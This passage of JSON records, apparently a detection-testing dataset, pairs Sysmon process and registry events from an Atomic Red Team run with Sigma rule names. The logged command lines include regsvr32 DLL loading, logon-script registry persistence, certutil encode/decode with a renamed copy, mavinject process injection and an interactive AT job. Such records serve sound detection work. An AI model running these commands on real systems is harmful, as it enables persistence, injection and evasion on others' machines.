(WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ProcessId":5828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:46.867"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4045,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.893188Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ParentProcessId":5828,"ProcessGuid":"747F3D96-D97B-5D31-0000-00109DEB3800","ProcessId":5788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:47.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4047,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:47.083068Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ProcessId":4240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:54.968"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4049,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:54.976854Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"EventData":{"CommandLine":"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ParentProcessId":4240,"ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:55.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4050,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:55.018275Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","Logon Scripts (UserInitMprLogonScript) Registry","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\UserInitMprLogonScript","UtcTime":"2019-07-19 14:54:01.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4051,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:54:01.925833Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ProcessId":4832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4061,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.235828Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -encode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ParentProcessId":4832,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00109E193C00","ProcessId":1260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4062,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.309488Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ProcessId":4020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4063,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.961276Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -decode file.txt c:\\file.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ParentProcessId":4020,"ProcessGuid":"747F3D96-DA3F-5D31-0000-001022323C00","ProcessId":6888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.818"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4064,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.974754Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %%windir%%\\\\system32\\\\certutil.exe %%temp%%tcm.tmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ProcessId":6572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4066,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.270645Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c copy C:\\Windows\\\\system32\\\\certutil.exe C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %windir%\\\\system32\\\\certutil.exe %temp%tcm.tmp\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ParentProcessId":6572,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010B1553C00","ProcessId":5168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.256"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4067,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.294575Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %%temp%%tcm.tmp -decode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.316"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4068,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.333864Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %temp%tcm.tmp -decode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ParentProcessId":4336,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ProcessId":3932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4069,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.361122Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ParentProcessId":3932,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010AB5F3C00","ProcessId":6260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.381"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4070,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.412850Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MavInject Process Injection"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\mavinject.exe\" 3912 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1055\\src\\x64\\T1055.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft Application Virtualization Injector","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A","Image":"C:\\Windows\\System32\\mavinject.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA4B-5D31-0000-0010CB413D00","ProcessId":2604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:15.754"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4078,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:15.776993Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Interactive AT Job"],"event":{"Event":{"EventData":{"CommandLine":"at 13:20 /interactive cmd","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Schedule service command line interface","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD","Image":"C:\\Windows\\System32\\at.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"at 13:20 /interactive cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA6A-5D31-0000-0010B2953E00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DA6A-5D31-0000-001004983E00","ProcessId":3864,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management AT","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 